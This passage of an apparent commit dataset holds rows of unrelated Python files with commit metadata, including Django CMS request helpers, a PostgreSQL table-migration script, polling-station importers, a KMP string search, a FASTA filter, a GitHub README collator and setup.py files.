    # a known template.
    requested = request.REQUEST.get('template', None)
    if requested is not None:
        known = dict(settings.PAGE_TEMPLATES)
        if requested in known or requested == settings.DEFAULT_PAGE_TEMPLATE:
            return requested
    if page is not None:
        return page.get_template()
    return settings.DEFAULT_PAGE_TEMPLATE
def get_language_from_request(request):
    """Return the most obvious language according the request."""
    # An explicit ?language= parameter wins.
    explicit = request.GET.get('language')
    if explicit:
        return explicit
    if not hasattr(request, 'LANGUAGE_CODE'):
        return settings.PAGE_DEFAULT_LANGUAGE
    # Map Django's detected language through the CMS mapping callable.
    return settings.PAGE_LANGUAGE_MAPPING(str(request.LANGUAGE_CODE))
| """Page CMS functions related to the request object."""
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import loader, Context, RequestContext
from django.core.urlresolvers import reverse
from pages import settings
def get_request_mock():
    """Build a request mock that can be used for testing."""
    bh = BaseHandler()
    bh.load_middleware()
    request = WSGIRequest({
        'REQUEST_METHOD': 'GET',
        'SERVER_NAME': 'test',
        'SERVER_PORT': '8000',
    })
    # NOTE(review): the WSGI environ carries no HTTP_HOST entry, so code
    # downstream that calls request.get_host() may misbehave -- confirm.
    # Apply request middleware
    for middleware_method in bh._request_middleware:
        # LocaleMiddleware should never be applied a second time because
        # it would broke the current real request language
        if 'LocaleMiddleware' not in str(middleware_method.im_class):
            # Return value intentionally unused; only the request mutations matter.
            response = middleware_method(request)
    return request
# Raised by the auto_render decorator below when only_context is requested
# but the view produced a full HTTP response instead of a tuple.
class AutoRenderHttpError(Exception):
    """Cannot return context dictionary because a view returned an HTTP
    response when a (template_name, context) tuple was expected."""
    pass
def auto_render(func):
    """
    This view decorator automatically calls the ``render_to_response``
    shortcut. A view that use this decorator should return a tuple of this
    form : (template name, context) instead of a ``HttpRequest`` object.
    """
    def _dec(request, *args, **kwargs):
        # Wrapper-only keyword arguments; removed before calling the view.
        template_override = kwargs.pop('template_name', None)
        only_context = kwargs.pop('only_context', False)
        if only_context:
            # return only context dictionary
            response = func(request, *args, **kwargs)
            if isinstance(response, HttpResponse):
                raise AutoRenderHttpError
            (template_name, context) = response
            return context
        response = func(request, *args, **kwargs)
        if isinstance(response, HttpResponse):
            # The view rendered (or redirected) on its own; pass it through.
            return response
        (template_name, context) = response
        # The chosen template name is also stored in the context.
        t = context['template_name'] = template_override or template_name
        return render_to_response(t, context,
            context_instance=RequestContext(request))
    return _dec
def get_slug_and_relative_path(path):
    """Return the page's slug and relative path."""
    root = reverse('pages-root')
    if path.startswith(root):
        # Strip the CMS root prefix.
        path = path[len(root):]
    if len(path) and path[-1] == '/':
        # Drop a single trailing slash.
        path = path[:-1]
    slug = path.split("/")[-1]
    lang = None
    if settings.PAGE_USE_LANGUAGE_PREFIX:
        # The first path component is the language code.
        lang = path.split("/")[0]
        path = path[(len(lang) + 1):]
    return slug, path, lang
def get_template_from_request(request, page=None):
    """
    Gets a valid template from different sources or falls back to the
    default template.
    """
    if settings.PAGE_TEMPLATES is None:
        return settings.DEFAULT_PAGE_TEMPLATE
    template = request.REQUEST.get('template', None)
    # Honour an explicit ?template=/POST override, but only when it names
    # a known template.
    if template is not None and \
        (template in dict(settings.PAGE_TEMPLATES).keys() or
        template == settings.DEFAULT_PAGE_TEMPLATE):
        return template
    if page is not None:
        return page.get_template()
    return settings.DEFAULT_PAGE_TEMPLATE
def get_language_from_request(request):
    """Return the most obvious language according the request."""
    # An explicit ?language= parameter wins.
    language = request.GET.get('language', None)
    if language:
        return language
    if hasattr(request, 'LANGUAGE_CODE'):
        # Map Django's detected language through the CMS mapping callable.
        return settings.PAGE_LANGUAGE_MAPPING(str(request.LANGUAGE_CODE))
    else:
        return settings.PAGE_DEFAULT_LANGUAGE
| Python | 0 |
99f454b3fa62cffac922a7b3431e0024e6dfde3d | add data migration script | dataactcore/scripts/migrateDataBroker.py | dataactcore/scripts/migrateDataBroker.py | # migrate data using pg_dump and pg_restore
# data copied from tables:
# error_data:
# error_metadata
# file
# job_tracker:
# job
# submission
# job_dependency
# user_manager;
# users
# email_token
# validator:
# appropriation
# award_financial
# award_financial_assistance
# object_class_program_activity
# run on command line: python migrateDataBroker.py
from dataactcore.config import CONFIG_DB
import subprocess
c = 'postgresql://{}:{}@{}/'.format(
    CONFIG_DB['username'], CONFIG_DB['password'], CONFIG_DB['host'])
target = '{}data_broker'.format(c)


def _copy_tables(source, tables, label):
    """Pipe a data-only pg_dump of *tables* from *source* into the target DB.

    *label* is echoed in the progress message.  Returns the shell return
    code (0 on success).
    """
    print('migrating {}'.format(label))
    table_flags = ' '.join('-t {}'.format(t) for t in tables)
    # shell=True is required for the pg_dump | pg_restore pipeline; the
    # command is built from trusted local config values, not user input.
    cmd = 'pg_dump -d {} {} --data-only --format=c | ' \
          'pg_restore -d {} --data-only'.format(source, table_flags, target)
    p = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
    print('return code = {}\n'.format(p))
    return p


# error_data
_copy_tables('{}error_data'.format(c), ['error_metadata', 'file'],
             'error_data')

# job_tracker
_copy_tables('{}job_tracker'.format(c), ['job_dependency', 'job', 'submission'],
             'job_tracker')

# user_manager
_copy_tables('{}user_manager'.format(c), ['users', 'email_token'],
             'user_manager')

# validation - these tables are larger, so copy them one at a time
source = '{}validation'.format(c)
for t in ['appropriation', 'object_class_program_activity',
          'award_financial', 'award_financial_assistance']:
    _copy_tables(source, [t], 'validation: {}'.format(t))
| Python | 0.000001 | |
17bbd6d44ec7edd1a079b12a44c283a358b11b92 | add import script for Teignbridge (closes #865) | polling_stations/apps/data_collection/management/commands/import_teignbridge.py | polling_stations/apps/data_collection/management/commands/import_teignbridge.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
    # GSS code of the council this importer covers (Teignbridge).
    council_id = 'E07000045'
    # The same Democracy Club export supplies both addresses and stations.
    addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017.tsv'
    stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017.tsv'
    elections = ['parl.2017-06-08']
    # The export is tab-separated despite the importer's "Csv" name.
    csv_delimiter = '\t'
| Python | 0 | |
c750cbb65541ea32c2f8904c394469a14fa1e82b | add import script for West Dorset | polling_stations/apps/data_collection/management/commands/import_west_dorset.py | polling_stations/apps/data_collection/management/commands/import_west_dorset.py | from data_collection.management.commands import BaseXpressDCCsvInconsistentPostcodesImporter
class Command(BaseXpressDCCsvInconsistentPostcodesImporter):
    # GSS code of the council this importer covers (West Dorset).
    council_id = 'E07000052'
    # The same Democracy Club export supplies both addresses and stations.
    addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017WDDC.TSV'
    stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017WDDC.TSV'
    elections = ['parl.2017-06-08']
    # The export is tab-separated despite the importer's "Csv" name.
    csv_delimiter = '\t'
    # Columns searched for a usable station postcode -- presumably tried
    # in this order by the inconsistent-postcodes base importer; confirm.
    station_postcode_search_fields = [
        'polling_place_postcode',
        'polling_place_address_4',
        'polling_place_address_3',
        'polling_place_address_2',
        'polling_place_address_1',
    ]
| Python | 0 | |
3e4ed4d6624ac0db7838e9aeb7a98710f746b2b8 | Create solution.py | hackerrank/algorithms/strings/easy/mars_exploration/py/solution.py | hackerrank/algorithms/strings/easy/mars_exploration/py/solution.py | #!/bin/python3
import sys
def solution(signal):
    """Count how many characters of *signal* differ from a repeating 'SOS'."""
    import itertools
    expected_stream = itertools.cycle('SOS')
    return sum(expected != received
               for expected, received in zip(expected_stream, signal))
# Read the received signal from stdin and report how many of its
# characters deviate from the repeating "SOS" pattern.
received_signal = input().strip()
print(solution(received_signal))
| Python | 0.000018 | |
eb9eb8fd295d8dbba66267e7551f4e6a51687797 | Set db starting point. | snippets/base/migrations/0062_set_asrsnippet_id_autoincrement_starting_point.py | snippets/base/migrations/0062_set_asrsnippet_id_autoincrement_starting_point.py | # Generated by Django 2.1.3 on 2018-11-16 12:30
from django.db import migrations
class Migration(migrations.Migration):
    dependencies = [
        ('base', '0061_auto_20181116_0810'),
    ]
    operations = [
        # Raw SQL: make new ASRSnippet ids start at 10500.  The second
        # argument ([''] -- empty statement) makes the reverse migration
        # a no-op.
        migrations.RunSQL(['ALTER TABLE base_asrsnippet AUTO_INCREMENT=10500;'], [''])
    ]
| Python | 0 | |
68e10dcb52f17aca1482112816062ea15e40097b | Create viruscheck.py | viruscheck.py | viruscheck.py | #!/usr/bin/env python
#Requires ClamAV to be installed
import sys
import subprocess
def clamscan():
scan = subprocess.check_output([
'clamscan',
'-r',
starting_dir
])
print scan
# Directory to scan, taken from the first command-line argument.
starting_dir = sys.argv[1]
print "Running scan.........."
clamscan()
| Python | 0 | |
70e14187ecd2567894e5e8183341a63835d6839c | Create pldm related specific constants file. | data/pldm_variables.py | data/pldm_variables.py | #!/usr/bin/python
r"""
Contains PLDM-related constants.
"""
# PLDM type codes (hex strings, as used on the wire).
PLDM_TYPE_BASE = '00'
PLDM_TYPE_PLATFORM = '02'
PLDM_TYPE_BIOS = '03'
PLDM_TYPE_OEM = '3F'

# Base (discovery) command codes.
PLDM_BASE_CMD = {
    'GET_TID': '2',
    'GET_PLDM_VERSION': '3',
    'GET_PLDM_TYPES': '4',
    'GET_PLDM_COMMANDS': '5'}

# Generic PLDM completion codes.
PLDM_SUCCESS = '00'
PLDM_ERROR = '01'
PLDM_ERROR_INVALID_DATA = '02'
PLDM_ERROR_INVALID_LENGTH = '03'
PLDM_ERROR_NOT_READY = '04'
PLDM_ERROR_UNSUPPORTED_PLDM_CMD = '05'
PLDM_ERROR_INVALID_PLDM_TYPE = '20'

# BIOS-specific completion codes.  Bug fix: the first two assignments
# originally carried trailing commas, which made the values 1-tuples
# (('83',)) instead of plain strings like every sibling constant.
BIOS_TABLE_UNAVAILABLE = '83'
INVALID_BIOS_TABLE_DATA_INTEGRITY_CHECK = '84'
INVALID_BIOS_TABLE_TYPE = '85'

# BIOS command codes.
PLDM_BIOS_CMD = {
    'GET_BIOS_TABLE': '01',
    'SET_BIOS_ATTRIBUTE_CURRENT_VALUE': '07',
    'GET_BIOS_ATTRIBUTE_CURRENT_VALUE_BY_HANDLE': '08',
    'GET_DATE_TIME': '0c'}

# Platform monitoring/control command codes.
PLDM_PLATFORM_CMD = {
    'SET_STATE_EFFECTER_STATES': '39',
    'GET_PDR': '51'}

PLDM_PDR_TYPES = {
    'STATE_EFFECTER_PDR': '11'}

# PLDM OEM related variables.
PLDM_FILEIO_CMD = {
    'GET_FILE_TABLE': '1',
    'READ_FILE': '4',
    'WRITE_FILE': '5',
    'READ_FILE_INTO_MEMORY': '6',
    'WRITE_FILE_FROM_MEMORY': '7'}

PLDM_FILEIO_COMPLETION_CODES = {
    'INVALID_FILE_HANDLE': '80',
    'DATA_OUT_OF_RANGE': '81',
    'INVALID_READ_LENGTH': '82',
    'INVALID_WRITE_LENGTH': '83',
    'FILE_TABLE_UNAVAILABLE': '84',
    'INVALID_FILE_TABLE_TYPE': '85'}
| Python | 0 | |
f6a4b230d3ee98d906920c2e1cd671208a5b3e96 | Python 1.5.4 | python/jsbeautifier/__version__.py | python/jsbeautifier/__version__.py | __version__ = '1.5.4'
| __version__ = '1.5.3'
| Python | 0.998796 |
8ff3b74df83055068b1f8abe05e8ce186ab6eb18 | implement strStr with KMP. Kana我喜欢你啊!!! | python/string/ImplementstrStr.py | python/string/ImplementstrStr.py | #KMP algorithm. can't get it. Just a simple implementation of
#0. https://www.youtube.com/watch?v=2ogqPWJSftE
#and
#1. http://www.cnblogs.com/zuoyuan/p/3698900.html
class Solution:
    # @param haystack, a string
    # @param needle, a string
    # @return an integer
    def strStr(self, haystack, needle):
        """Return the index of the first occurrence of needle in haystack,
        or -1 if needle is not a substring (KMP algorithm, O(n + m))."""
        n = len(haystack)
        m = len(needle)
        if m == 0 or haystack == needle:
            return 0
        prefix = self.prefixMap(needle)
        q = 0  # number of needle characters currently matched
        for i in range(n):
            # Fall back through the failure function on a mismatch.
            while q > 0 and needle[q] != haystack[i]:
                q = prefix[q - 1]
            if needle[q] == haystack[i]:
                q = q + 1
            if q == m:
                return i - m + 1
        return -1

    def prefixMap(self, needle):
        """Build the KMP failure function: prefix[i] is the length of the
        longest proper prefix of needle[:i+1] that is also its suffix."""
        prefix = [0] * len(needle)
        a = 0
        # range() instead of xrange() so this runs on both Python 2 and 3.
        for b in range(2, len(needle) + 1):
            while a > 0 and needle[a] != needle[b - 1]:
                a = prefix[a - 1]
            if needle[a] == needle[b - 1]:
                a += 1
            prefix[b - 1] = a
        return prefix
if __name__ == "__main__":
    solution = Solution()
    # Smoke tests: "pi" first occurs at index 9; identical strings give 0.
    print solution.strStr("mississippi", "pi")
    print solution.strStr("a", "a")
| Python | 0 | |
8b42b0825d5cbb6becef9669b43a2c8229ea8642 | Add script to remove unpaired fasta entries. | remove_unpaired_fasta_entries.py | remove_unpaired_fasta_entries.py | #!/usr/bin/env python
"""
Remove unpaired reads from a fasta file.
This script can be used for the case that unpaired reads (e.g. as
reads were removed during quality trimming) in a pair of fasta files
from paired-end sequencing need to be removed.
"""
import argparse
from Bio import SeqIO
from Bio.SeqIO.FastaIO import FastaWriter
parser = argparse.ArgumentParser()
parser.add_argument("fasta_file_to_filter")
parser.add_argument("reference_fasta_file")
parser.add_argument("--output_fasta", default="output.fa")
args = parser.parse_args()
# Collect the record IDs present in the reference file.  Only the first
# whitespace-separated token of each ID is kept, so descriptions and
# pair suffixes after the ID do not affect matching.  A set replaces the
# previous dict-with-dummy-values idiom.
reference_headers = set()
for seq_record in SeqIO.parse(args.reference_fasta_file, "fasta"):
    reference_headers.add(seq_record.id.split()[0])
# Write only the records whose ID also occurs in the reference file.
with open(args.output_fasta, 'w') as output_fh:
    writer = FastaWriter(output_fh, wrap=0)
    writer.write_file(
        seq_record
        for seq_record in SeqIO.parse(args.fasta_file_to_filter, "fasta")
        if seq_record.id.split()[0] in reference_headers)
| Python | 0 | |
dcea9761c47931bef23c60c26fc9de4c5370dfdd | Add collate_readmes | collate_readmes.py | collate_readmes.py | """Collate the README.md files of all repos generated from a template, into a single Markdown file
that contains a section for each repo.
Each individual README is prepended with a header that includes the GitHub login, as inferred from the name of the
generated repo. If the README already begins with a header, the login is appended, or substituted if the header is
simply "About Me".
If a file Roster.csv with columns "GitHub Login", "Preferred Name", and "Last Name" is present in the current directory,
these names are used instead of the GitHub login.
Usage:
python collate_readmes.py
python collate_readmes.py | pandoc --from markdown --metadata pagetitle="About Me" -s -o about.html
"""
from datetime import datetime
from dateutil import tz
import re
import sys
import json
import os
import subprocess
from pathlib import Path
from string import Template
import numpy as np
import pandas as pd
from graphqlclient import GraphQLClient
def get_git_config(name):
    """Return the value of the git config entry *name*.

    Raises an Exception carrying git's stderr when the lookup fails.
    """
    proc = subprocess.run(
        ["git", "config", name], capture_output=True, text=True
    )
    if proc.returncode != 0:
        raise Exception(proc.stderr.strip())
    return proc.stdout.rstrip()
# Personal access token for the GitHub GraphQL API: taken from the
# environment, falling back to the `user.accesstoken` git config entry.
GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_ACCESS_TOKEN") or get_git_config(
    "user.accesstoken"
)
# Shared GraphQL client, authenticated once at import time.
GH_CLIENT = GraphQLClient("https://api.github.com/graphql")
GH_CLIENT.inject_token(f"token {GITHUB_ACCESS_TOKEN}")
def query(gql, variables=None):
    """Perform a GraphQL query, with error detection and variable substitution.

    Each variable is JSON-encoded and substituted into the query text via
    string.Template ($name placeholders) before execution.
    """
    variables = variables or {}
    substitutions = {key: json.dumps(value) for key, value in variables.items()}
    rendered = Template(gql).substitute(**substitutions)
    payload = json.loads(GH_CLIENT.execute(rendered, variables))
    if "errors" in payload:
        # TODO include err['locations'] = {'line', 'column'}
        messages = [error["message"] for error in payload["errors"]]
        raise Exception("\n".join(messages))
    return payload["data"]
ORG_REPOS_GQL = """
query {
organization(login: $organization_login) {
repositories(first: 100, after: $cursor) {
nodes {
name
nameWithOwner
readme: object(expression: "master:README.md") {
... on Blob {
text
}
}
templateRepository {
nameWithOwner
}
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 100) {
edges {
node {
oid
authoredDate
committedDate
pushedDate
author {
name
email
date
}
}
}
}
}
}
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
"""
def get_generated_repos(name_with_owner):
    """Return (master_repo, repos_generated_from_it) for a template repo."""
    org_login = name_with_owner.split("/")[0]
    repos = []
    cursor = None
    while True:
        data = query(ORG_REPOS_GQL,
                     {"organization_login": org_login, "cursor": cursor})
        repositories = data["organization"]["repositories"]
        repos.extend(repositories["nodes"])
        page = repositories["pageInfo"]
        if not page["hasNextPage"]:
            break
        cursor = page["endCursor"]
    master = next(r for r in repos if r["nameWithOwner"] == name_with_owner)
    forks = [
        r for r in repos
        if r["templateRepository"]
        and r["templateRepository"]["nameWithOwner"] == name_with_owner
    ]
    return master, forks
def longest_prefix(names):
    """Return the longest common (character-wise) prefix of the repo names.

    Uses os.path.commonprefix, which works character-by-character (not
    path-component-wise).  Unlike the previous hand-rolled scan, this
    returns '' instead of raising (StopIteration / ValueError) when
    *names* is empty or shares no common prefix.
    """
    return os.path.commonprefix(list(names))
def annotate_repos(repos, roster):
    """Annotate each repo with the student's login, display name and commits.

    The login is whatever follows the longest common prefix of all the
    repository names; *roster* maps logins to display names (the login is
    used verbatim when no roster entry exists).
    """
    common_prefix = longest_prefix([repo["name"] for repo in repos])
    prefix_len = len(common_prefix)
    for repo in repos:
        login = repo["name"][prefix_len:]
        repo["login"] = login
        repo["author"] = roster.get(login, login)
        # Keep only commits that Christian didn't author.
        repo["commits"] = [
            edge["node"]
            for edge in repo["ref"]["target"]["history"]["edges"]
            if edge["node"]["author"]["email"] != "christian@nyu.edu"
        ]
def read_roster():
    """Return a dict mapping GitHub login -> "First Last" display name.

    Reads Roster.csv from the current directory.  Returns {} when the
    file is missing or when none of the recognized first-name columns
    ("Preferred", "English", "First") is present (the original raised a
    TypeError in that case).  Rows whose combined name is not a string
    (e.g. NaN from missing cells) are skipped.
    """
    roster_path = Path("Roster.csv")
    if not roster_path.exists():
        return {}
    roster = pd.read_csv(roster_path)
    column_first_names = ["Preferred", "English", "First"]
    first_names = next(
        (roster[name] for name in column_first_names if name in roster), None
    )
    if first_names is None:
        # No recognizable first-name column: better an empty mapping than
        # a crash on None + " " below.
        return {}
    names = first_names + " " + roster["Last"]
    return {
        login: name
        for login, name in zip(roster["GitHub Login"], names)
        if isinstance(name, str)
    }
def is_late_commit(commit):
    """Return True if the commit was authored after the submission deadline.

    Bug fix: the dates are now parsed instead of compared as raw strings.
    ISO-8601 strings with different UTC offsets do not order correctly
    under lexicographic comparison (e.g. "2019-09-08T20:00:00Z" is after
    the "2019-09-09T03:00:00+08:00" deadline, but sorts before it as a
    string).  GitHub's trailing "Z" is normalized to "+00:00" for
    datetime.fromisoformat.
    """
    deadline = datetime.fromisoformat("2019-09-09T03:00:00+08:00")
    authored = commit["author"]["date"].replace("Z", "+00:00")
    return datetime.fromisoformat(authored) > deadline
def print_late_commits(repos):
    """Print a report of missing, fully-late and partially-late submissions."""
    # Show repos that were turned in late or not at all
    # report missing and late assignments
    # The categories below overlap (note all([]) is True, so a repo with
    # no commits also satisfies "Late"); the dedup pass further down
    # relies on dict insertion order so each repo is reported under the
    # first matching label only.
    warnings = {
        "No commits": [r for r in repos if not r["commits"]],
        "Late": [r for r in repos if all(map(is_late_commit, r["commits"]))],
        "Some late commits": [
            r for r in repos if any(map(is_late_commit, r["commits"]))
        ],
    }
    # only reported
    reported = []
    for label, rs in warnings.items():
        # Skip repos already reported under an earlier (stronger) label.
        rs = [r for r in rs if r not in reported]
        reported += rs
        if rs:
            print(f"{label}: {', '.join(sorted(r['login'] for r in rs))}")
    # Detail section: each late commit's timestamp, rendered in China time.
    for r in repos:
        commits = [c for c in r["commits"] if is_late_commit(c)]
        if not commits:
            continue
        print(f"  {r['login']}:")
        timestamps = {c["author"]["date"] for c in commits}
        for ts in timestamps:
            dt = (
                datetime.fromisoformat(ts)
                .astimezone(tz.gettz("China"))
                .strftime("%H:%M %a, %b %-d")
            )
            print(f"    {dt}")
def increment_headings(markdown):
    """Increment all the heading levels of a markdown string, if it contains a level-one heading.

    This also normalizes heading lines so exactly one space follows the hashes.

    Note: this doesn't know not to look in fenced blocks
    """
    # Normalize the '## ' spacing to exactly one space after the hashes.
    markdown = re.sub(r"^(#+)\s*", r"\1 ", markdown, flags=re.M)
    if re.search(r"^# ", markdown, flags=re.M):
        # There's an H1 -- increment every Hn.  Bug fix: matching (and
        # consuming) the trailing space avoids the double space the old
        # replacement produced ("##  title").
        markdown = re.sub(r"^(#+) ", r"\1# ", markdown, flags=re.M)
    return markdown
def print_collated_readme(repos):
    """Print every repo's README as one document, one titled section each.

    A README's own H1 is kept (with the student's name appended when it
    isn't already there); otherwise, or when the H1 is just "About Me",
    the section is titled with the student's name.
    """
    for r in repos:
        name = r["author"]
        # NOTE(review): assumes every repo has a README blob
        # (r["readme"] is not None) -- same assumption as before.
        text = r["readme"]["text"].strip()
        if text.startswith("# "):
            # partition() (unlike split("\n", 1)) also handles a README
            # that is a single heading line with no body, which used to
            # raise ValueError on unpacking.
            title, _, about = text.partition("\n")
        else:
            title, about = None, text
        if not title or title == "# About Me":
            title = "# " + name
        if name not in title:
            title += f" ({name})"
        print(increment_headings(title + "\n" + about))
        print("\n---\n")
def main():
    """Entry point: collect the generated repos and emit the collated README."""
    # master (the template repo itself) is fetched but unused here.
    master, repos = get_generated_repos("application-lab/1-WELCOME-TO-APPLAB")
    annotate_repos(repos, read_roster())
    # Drop repos without student commits, then sort by display name.
    repos = [r for r in repos if r["commits"]]
    repos.sort(key=lambda r: r["author"])
    # Hard-coded toggles: flip to report late/missing submissions instead.
    if False:
        print_late_commits(repos)
    if True: # print collated readme
        print_collated_readme(repos)
if __name__ == "__main__":
    main()
| Python | 0.000003 | |
b84af881f800bfad13b5e90379c5f4ec0445239a | Add setup.py. | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
# Distutils metadata; the whole library ships as the single module pymoira.py.
# NOTE(review): "managment" in the description is a typo ("management") --
# fix in a metadata-only release.
setup(name = 'pymoira',
      version = '1.0',
      description = 'Client library for MIT Moira service managment system protocol',
      author = 'Victor Vasiliev',
      author_email = 'vasilvv@mit.edu',
      url = 'https://github.com/vasilvv/pymoira',
      license = 'MIT',
      py_modules = ['pymoira'])
| Python | 0 | |
52d3a5a20c7f1bf4c874e4210fd17753a67d5c71 | Add ID command | commands/cmd_id.py | commands/cmd_id.py | from lib.command import Command
class IdCommand(Command):
    """Telegram command replying with the caller's user ID, or with the
    chat's ID when '-c' or 'chat' is passed as an argument."""

    name = 'id'
    description = 'Returns your user ID, or the ID of the current chat when -c or \'chat\' is passed as an argument.'

    def run(self, message, args):
        # Bug fix: the original tested `'-c' or 'chat' in args`, which is
        # always truthy ('-c' is a non-empty string), so every reply was
        # the chat ID.  Each membership test needs its own `in`.
        if '-c' in args or 'chat' in args:
            reply = 'This chat\'s ID is {0}'.format(message.chat.id)
        else:
            reply = 'Your Telegram ID is {0}'.format(message.from_user.id)
        self.reply(message, reply)
| Python | 0.000012 | |
9bc26f8a0d2c209fc3e73cd0f267164bfd49fef3 | Update setup.py | setup.py | setup.py | #!/usr/bin/env python2
from distutils.core import setup
from wok import version
# Package metadata for wok.  Two commas were missing in the original
# (after long_description and after the classifiers list), both of which
# made this file a SyntaxError.
setup(
    name='wok',
    version=version.encode("utf8"),
    author='Mike Cooper',
    author_email='mythmon@gmail.com',
    url='http://wok.mythmon.com',
    description='Static site generator',
    long_description=
        "Wok is a static website generator. It turns a pile of templates, "
        "content, and resources (like CSS and images) into a neat stack of "
        "plain HTML. You run it on your local computer, and it generates a "
        "directory of web files that you can upload to your web server, or "
        "serve directly.",  # <- this comma was missing
    download_url="http://wok.mythmon.com/download",
    classifiers=[
        "Development Status :: 4 - Beta",
        "License :: OSI Approved :: MIT License",
        'Operating System :: POSIX',
        'Programming Language :: Python',
    ],  # <- this comma was missing
    requires=['pyyaml', 'jinja2', 'Markdown', 'docutils', 'Pygments'],
    packages=['wok'],
    scripts=['scripts/wok'],
)
| #!/usr/bin/env python2
from distutils.core import setup
from wok import version
# Older wok packaging: hard dependencies are declared via
# install_requires (setuptools-style), not the `requires` metadata field.
setup(name='wok',
      version=version.encode("utf8"),
      description='Static site generator',
      install_requires=['pyyaml', 'jinja2'],
      author='Mike Cooper',
      author_email='mythmon@gmail.com',
      url='https://www.github.com/mythmon/wok',
      packages=['wok'],
      scripts=['scripts/wok'],
      )
| Python | 0.000001 |
8238e0476097af0afed1443391370285dd61d8ca | Add setup.py | setup.py | setup.py | #!/usr/bin/env python
import setuptools
import os
# Execute the metadata module to pull __author__, __author_email__,
# __license__ and __version__ into this namespace without importing the
# (possibly not-yet-installable) package itself.
with open(os.path.join('fs', 'sshfs', '__metadata__.py')) as f:
    exec(f.read())
CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: MIT License',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3.3',
    'Programming Language :: Python :: 3.4',
    'Programming Language :: Python :: 3.5',
    'Programming Language :: Python :: 3.6',
    'Topic :: System :: Filesystems',
]
# Long description and requirement lists come straight from the repo files.
with open('README.rst', 'rt') as f:
    DESCRIPTION = f.read()
with open('requirements.txt') as f:
    REQUIREMENTS = f.read().splitlines()
# Skip '-r ...' include lines; the shared requirements are appended below.
with open(os.path.join('tests', 'requirements.txt')) as f:
    TEST_REQUIREMENTS = [l for l in f if not l.startswith('-r')]
TEST_REQUIREMENTS.extend(REQUIREMENTS)
setuptools.setup(
    author=__author__,
    author_email=__author_email__,
    classifiers=CLASSIFIERS,
    description="Pyfilesystem2 implementation for SSH/SFTP using paramiko ",
    install_requires=REQUIREMENTS,
    license=__license__,
    long_description=DESCRIPTION,
    name='fs.sshfs',
    packages=setuptools.find_packages(exclude=("tests",)),
    platforms=['any'],
    test_suite="tests",
    tests_require=TEST_REQUIREMENTS,
    url="https://github.com/althonos/fs.sshfs",
    version=__version__,
)
| Python | 0.000001 | |
72416d5bf4308c10bc9b2ab31464ad2853042402 | Use the official package django select2 that finally support py3 | setup.py | setup.py | #!/usr/bin/env python
"""
Installation script:
To release a new version to PyPi:
- Ensure the version is correctly set in accounting.__init__.py
- Run:
`python setup.py sdist`
`twine upload dist/*`
"""
from setuptools import setup, find_packages
import os
import sys
from accounting import get_version
# Directory of this setup.py, used to locate README.rst.
PROJECT_DIR = os.path.dirname(__file__)
setup(name='django-accounting',
      version=get_version().replace(' ', '-'),
      url='https://github.com/dulaccc/django-accounting',
      author="Pierre Dulac",
      author_email="pierre@dulaccc.me",
      description="Accounting made accessible for small businesses and "
                  "sole proprietorships through a simple Django project",
      long_description=open(os.path.join(PROJECT_DIR, 'README.rst')).read(),
      keywords="Accounting, Django, Money, Cashflow",
      license='MIT',
      platforms=['linux'],
      packages=find_packages(exclude=["tests*"]),
      include_package_data=True,
      install_requires=[
          'django>=1.7.0,<1.8',
          # Used to render the forms
          'django-bootstrap3==4.11.0',
          # Used to improve the forms
          # NOTE(review): 'Django_Select2_Py3' looks superseded by the
          # official 'django-select2' pinned at the end of this list;
          # keeping both installs two providers of the same module --
          # confirm and drop one.
          'Django_Select2_Py3>=4.2.1',
          # Used for date/time form fields
          'django-datetime-widget>=0.9,<1.0',
          # Define beautiful tags
          'django-classy-tags==0.5.1',
          # Internationalization
          'Babel>=1.0,<1.4',
          # Date utilities
          'python-dateutil>=2.2,<2.3',
          # Select2
          'django-select2>=4.3,<4.4',
      ],
      # See http://pypi.python.org/pypi?%3Aaction=list_classifiers
      classifiers=[
          'Development Status :: 2 - Pre-Alpha',
          'Environment :: Web Environment',
          'Framework :: Django',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Operating System :: Unix',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
          'Topic :: Software Development :: Libraries :: Application Frameworks']
      )
| #!/usr/bin/env python
"""
Installation script:
To release a new version to PyPi:
- Ensure the version is correctly set in accounting.__init__.py
- Run:
`python setup.py sdist`
`twine upload dist/*`
"""
from setuptools import setup, find_packages
import os
import sys
from accounting import get_version
# Directory of this setup.py, used to locate README.rst.
PROJECT_DIR = os.path.dirname(__file__)
setup(name='django-accounting',
      version=get_version().replace(' ', '-'),
      url='https://github.com/dulaccc/django-accounting',
      author="Pierre Dulac",
      author_email="pierre@dulaccc.me",
      description="Accounting made accessible for small businesses and "
                  "sole proprietorships through a simple Django project",
      long_description=open(os.path.join(PROJECT_DIR, 'README.rst')).read(),
      keywords="Accounting, Django, Money, Cashflow",
      license='MIT',
      platforms=['linux'],
      packages=find_packages(exclude=["tests*"]),
      include_package_data=True,
      install_requires=[
          'django>=1.7.0,<1.8',
          # Used to render the forms
          'django-bootstrap3==4.11.0',
          # Used to improve the forms
          'Django_Select2_Py3>=4.2.1',
          # Used for date/time form fields
          'django-datetime-widget>=0.9,<1.0',
          # Define beautiful tags
          'django-classy-tags==0.5.1',
          # Internationalization
          'Babel>=1.0,<1.4',
          # Date utilities
          'python-dateutil>=2.2,<2.3',
      ],
      # NOTE(review): dependency_links is deprecated and ignored by modern
      # pip unless --process-dependency-links is passed -- confirm the
      # Select2 fork still installs from this GitHub URL.
      dependency_links=[
